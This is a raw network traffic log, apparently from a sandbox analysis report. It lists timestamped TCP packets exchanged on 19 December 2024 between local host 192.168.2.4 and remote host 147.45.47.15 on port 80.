                                                                                                              Dec 19, 2024 08:11:51.128789902 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.129817009 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.129832029 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.129873037 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.130764008 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.130918026 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.131203890 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.131867886 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.132049084 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.132095098 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.132910967 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.133080959 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.133136034 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.133850098 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.134011030 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.134943962 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.134963036 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.135010958 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.135025024 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.135900021 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.136053085 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.136101961 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.136893988 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.137187958 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.137450933 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.138101101 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.138276100 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.139067888 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.139120102 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.139203072 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.139251947 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.140089035 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.140259027 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.140312910 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.141081095 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.141233921 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.141275883 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.142165899 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.142321110 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.142357111 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.142529011 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.142540932 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.142582893 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.143008947 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.143085003 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.143347025 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.143974066 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.144071102 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.144114971 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.145015001 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.145124912 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.145173073 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.146070004 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.146239042 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.146287918 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.147139072 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.147211075 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.147253990 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.148308992 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.148403883 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.148534060 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.149749041 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.150134087 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.150180101 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.150791883 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.150847912 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.151217937 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.151614904 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.151696920 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.151743889 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.152333975 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.152386904 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.152435064 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.152633905 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.153315067 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.153450966 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.153493881 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.154375076 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.154498100 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.154635906 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.155414104 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.155509949 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.155551910 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.156441927 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.156546116 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.156586885 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.157500982 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.157594919 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.157672882 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.158545971 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.158629894 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.158704996 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.159544945 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.159663916 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.159837008 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.159852982 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.160624027 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.160739899 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.160784006 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.161700964 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.161880970 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.161933899 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.162673950 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.162728071 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.162770987 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.163702011 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.163820982 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.163865089 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.164767981 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.164844036 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.164889097 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.165800095 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.166510105 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.304018021 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.304064035 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.304105043 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.304439068 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.304610014 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.304650068 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.305510044 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.305665970 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.305707932 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.306993008 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.307009935 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.307059050 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.307554007 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.307742119 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.307821989 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.308860064 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.308875084 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.308921099 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.309781075 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.309830904 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.310210943 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.310997963 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.311158895 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.311218977 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.311885118 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.311897039 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.311940908 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.312825918 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.313031912 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.313071012 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.313807964 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.314039946 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.314408064 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.315080881 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.315095901 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.315135956 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.315854073 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.316004992 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.316056967 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.316931963 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.317023039 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.317063093 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.318154097 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.318167925 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.318211079 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.319025993 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.319130898 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.319174051 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.320055962 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.320384026 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.320422888 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.321100950 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.321223974 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.321274042 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.322134972 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.322285891 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.322330952 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.323271990 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.323362112 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.323442936 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.324242115 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.324326038 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.325331926 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.325345993 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.325381994 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.325416088 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.326428890 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.326442957 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.326508999 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.327323914 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.327531099 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.327574968 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.328402042 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.328612089 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.328658104 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.329499006 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.329577923 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.329719067 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.330461979 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.330527067 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.330599070 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.331486940 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.331666946 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.331712961 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.332561016 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.332648993 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.332761049 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.333570957 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.333699942 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.333739996 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.334613085 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.334739923 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.334784985 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.335819006 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.335832119 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.335892916 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.336833954 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.336847067 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.336889029 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.337943077 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.337955952 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.338002920 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.339004040 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.339016914 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.339063883 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.339828014 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.339927912 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.340020895 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.340915918 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.340948105 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.341023922 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.341948986 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.342109919 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.342155933 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.342947006 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.343194962 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.343245983 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.344048977 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.344098091 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.344325066 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.345046997 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.345150948 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.345195055 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.346113920 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.346127987 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.346183062 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.347126961 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.347193956 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.347369909 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.348130941 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.348261118 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.348328114 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.349208117 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.349263906 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.349503040 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.350295067 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.350320101 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.350361109 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.351244926 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.351357937 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.351875067 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.352298021 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.352433920 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.352473021 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.353372097 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.353496075 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.353540897 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.354420900 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.354475021 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.354522943 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.355547905 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.355564117 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.355618954 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.356704950 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.356718063 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.356760979 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.358016014 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.358030081 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.358086109 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.358922005 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.410634041 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.496192932 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.496272087 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.496432066 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.496494055 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.496546030 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.496773958 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.497782946 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.497796059 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.497845888 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.498526096 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.498620033 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.498714924 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.499552011 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.499711037 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.499774933 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.500750065 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.500761986 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.500797987 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.501722097 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.501774073 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.501988888 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.502672911 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.502815008 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.502855062 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.503762960 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.503776073 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.503818989 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.504796028 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.504914045 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.505249023 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.505754948 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.505918026 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.505959034 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.506835938 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.507067919 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.507107019 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.508023977 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.508037090 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.508069992 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.508965969 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.509196043 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.509241104 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:51.509963036 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.510082006 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:51.510116100 CET4973880192.168.2.4147.45.47.15
